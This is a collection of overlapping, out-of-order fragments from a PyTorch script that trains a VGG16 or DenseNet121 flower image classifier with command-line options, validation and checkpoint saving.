"usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture", "torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): '''", "running_loss += loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss,", "architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden:", "six datasets and loaders, in the same order. ''' train_dir = data_dir +", "print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda'", "for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device),", "= architecture input_ = 25088 if hidden: hidden = hidden else: print('No number", "0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels =", "''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA", "inputs specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate", "elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.')", "main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to", "('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device)", "file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main():", "1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). Default is", "optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function", "input given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader,", "valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device),", "model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1',", "= model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data ==", "use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'')", "'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU:", "parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)),", "parses them for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params')", "GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU", "{ 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True)", "+= criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc +=", "models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\'", "def arg_parser(): ''' Takes in command-line arguments and parses them for usage of", "criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our model.", "transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test':", "the device based on the parameter. Also handles most edge-cases. Returns the device", "torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict import os", "on the parameter. Also handles most edge-cases. Returns the device variable to be", "model ''' steps = 0 if epochs: epochs = epochs else: print('No epochs", "= models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True)", "as np import torch from torch import nn from torch import optim import", "valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss =", "datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train':", "collections import OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes", "data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data,", "help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float,", "input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ =", "learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device)", "print('No epochs specified. Fallback to default epochs: 1') epochs = 1 print('Training Model", "model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please", "(inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad()", "= epochs else: print('No epochs specified. Fallback to default epochs: 1') epochs =", "0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224),", "+= labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct /", "/ total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the", "return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also loads", "valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)),", "labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total", "images, labels = data images, labels = images.to(device), labels.to(device) outputs = model(images) _,", "''' Validation function for our model. Returns validation loss and accuracy. ''' valid_loss", "device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to", "if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device,", "torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture", "+ '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75),", "in test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs =", "train, test and validation. Also loads dataloaders for all three in the same", "{}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to the given", "epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in", "path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs =", "Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ =", "optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device,", "dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([", "data in test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs", "valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device,", "valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model", "round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture):", "'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'],", "validation loss and accuracy. ''' valid_loss = 0 valid_acc = 0 for ii,", "Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss", "valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader,", "all six datasets and loaders, in the same order. ''' train_dir = data_dir", "epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ ==", "a torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name =", "print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout:", "if dropout: dropout = dropout else: print('No dropout specified. Fallback to default dropout:", "'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64,", "dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier", "''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ =", "running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs,", "hidden = hidden else: print('No number of hidden inputs specified. Fallback to default", "image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) }", "vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. Default", "= argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16", "[0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']),", "default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e", "dropout, hidden, learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16': model", "gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available;", "arguments and parses them for usage of our Python functions. ''' parser =", "from torch import optim import torch.nn.functional as F import torch.utils.data from torchvision import", "for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "{} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0", "import nn from torch import optim import torch.nn.functional as F import torch.utils.data from", "])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model,", "Loads data for train, test and validation. Also loads dataloaders for all three", "valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our", "model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden =", "== 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss", "0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),", "learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout specified. Fallback", "shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'],", "them for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture',", "Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate", "= { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32,", "import pandas as pd import numpy as np import torch from torch import", "model.name = architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or", "GPU (Y for Yes; N for No). Default is Y.') args = parser.parse_args()", "Also loads dataloaders for all three in the same order. Returns all six", "the same order. Returns all six datasets and loaders, in the same order.", "learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout", "type=int, help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout", "Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data,", "def validation(model, valid_loader, criterion, device): ''' Validation function for our model. Returns validation", "model to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs =", "and accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels)", "complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model '''", "Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No).", "model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate", "saved to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu", "criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)),", "# Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward()", "= models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden = hidden", "Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture:", "= inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss", "layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is", "Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers.", "print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy:", "valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device):", "in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps +=", "device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps = 0", "and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss", "Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss,", "criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean()", "our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural", "0 if epochs: epochs = epochs else: print('No epochs specified. Fallback to default", "= 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss =", "learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001", "'/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(),", "1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "Functions def arg_parser(): ''' Takes in command-line arguments and parses them for usage", "labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() #", "output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data", "pandas as pd import numpy as np import torch from torch import nn", "steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader,", "3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training", "our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training.", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if", "= torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU')", "parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu',", "'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) }", "CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device", "+= equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1,", "= data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir +", "labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model,", "correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves", "0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation", "def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural", "Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is", "Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes;", "Fallback to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad", "default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False", "else: print('No input given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu)", "CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect", "model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model", "train_data, epochs, architecture): ''' Saves the model to the given path. ''' model.class_to_idx", "loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc =", "round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} ::", "torch from torch import nn from torch import optim import torch.nn.functional as F", "help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for", "25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else:", "hidden: hidden = hidden else: print('No number of hidden inputs specified. Fallback to", "model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name =", "specified. Fallback to default epochs: 1') epochs = 1 print('Training Model for {}", "'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'],", "parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int,", "(labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer,", "model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy", "models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name", "epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs, labels) in", "''' steps = 0 if epochs: epochs = epochs else: print('No epochs specified.", "running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): '''", "order. Returns all six datasets and loaders, in the same order. ''' train_dir", "Prints validation accuracy of model ''' correct = 0 total = 0 with", "for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str,", "if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using", ":: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1,", "102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer", "Yes; N for No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'):", "epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx,", "transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture)", "model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint", "to be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else", "{'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224),", "gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model,", "25088 if hidden: hidden = hidden else: print('No number of hidden inputs specified.", "same order. Returns all six datasets and loaders, in the same order. '''", "= train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data,", "dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on", "image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter. Also", "0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss =", "for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available()", "image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter. Also handles", "+= loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc", "Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N", "model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader,", "is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is 0.05.')", "strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network.", "e in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps", "backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss +=", "for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)),", "optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms", "_, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item()", "import torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict import", "the parameter. Also handles most edge-cases. Returns the device variable to be used", "number of hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024", "in the same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir", "{ 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders =", "torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def", "= round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {}", "= data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224),", "epochs specified. Fallback to default epochs: 1') epochs = 1 print('Training Model for", "parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also", "1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture}", "model.name = architecture input_ = 25088 if hidden: hidden = hidden else: print('No", "in the same order. Returns all six datasets and loaders, in the same", "architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else:", "= 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels = data", "'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N':", "help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value", "train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir", "valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture =", "validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct = 0", "valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains", "dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the", "our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout", "+ '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms", "optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model '''", "criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader,", "nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss()", "shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def", "0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "the device variable to be used later. ''' if gpu=='Y': device = torch.device('cuda'", "range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1", "= set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer", "1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs):", "device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3)", "labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality =", "else: print('No epochs specified. Fallback to default epochs: 1') epochs = 1 print('Training", "is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). Default", "device): ''' Prints validation accuracy of model ''' correct = 0 total =", "(Y for Yes; N for No). Default is Y.') args = parser.parse_args() return(args)", "import OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes in", "= 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default", "learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate", "ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader,", "for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for", "Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc = 0 for", "('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier =", "CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens", "inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs =", "dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a", "= classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer)", "models, transforms from collections import OrderedDict import os import argparse # Functions def", "= arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU:", "0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir,", "= epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx':", "parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). Default is Y.')", "bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer =", "of 